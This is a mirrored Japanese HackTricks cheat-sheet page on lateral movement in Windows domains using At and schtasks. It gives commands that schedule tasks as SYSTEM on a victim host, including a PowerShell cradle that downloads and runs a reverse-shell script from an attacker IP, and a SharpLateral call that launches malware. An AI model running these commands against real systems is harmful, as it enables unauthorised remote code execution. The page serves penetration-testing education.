mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
66 lines
4.1 KiB
Markdown
66 lines
4.1 KiB
Markdown
# AtExec / SchtasksExec
|
|
|
|
<details>
|
|
|
|
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
|
|
|
|
HackTricksをサポートする他の方法:
|
|
|
|
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
|
|
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**してください。
|
|
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
|
|
|
</details>
|
|
|
|
## 動作原理
|
|
|
|
Atは、ユーザー名/(パスワード/ハッシュ)を知っているホストでタスクをスケジュールすることができます。したがって、他のホストでコマンドを実行し、出力を取得するために使用できます。
|
|
```
|
|
At \\victim 11:00:00PM shutdown -r
|
|
```
|
|
Using schtasks, you first need to create the task and then call it:
|
|
|
|
{% code overflow="wrap" %}
|
|
schtasksを使用するには、まずタスクを作成してから呼び出す必要があります。
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
|
|
schtasks /run /tn <TASK_NAME> /S <VICTIM>
|
|
```
|
|
{% endcode %}
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
|
|
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
|
|
```
|
|
{% endcode %}
|
|
|
|
[SharpLateral](https://github.com/mertdas/SharpLateral)も使用できます:
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
|
|
```
|
|
```markdown
|
|
{% endcode %}
|
|
|
|
[**silver ticketsを使用したschtasksの詳細はこちら**](../active-directory-methodology/silver-ticket.md#host)。
|
|
|
|
<details>
|
|
|
|
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック!</strong></summary>
|
|
|
|
HackTricksをサポートする他の方法:
|
|
|
|
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
|
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
|
* **あなたのハッキングのコツを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリにPRを提出する。
|
|
|
|
</details>
|
|
```
|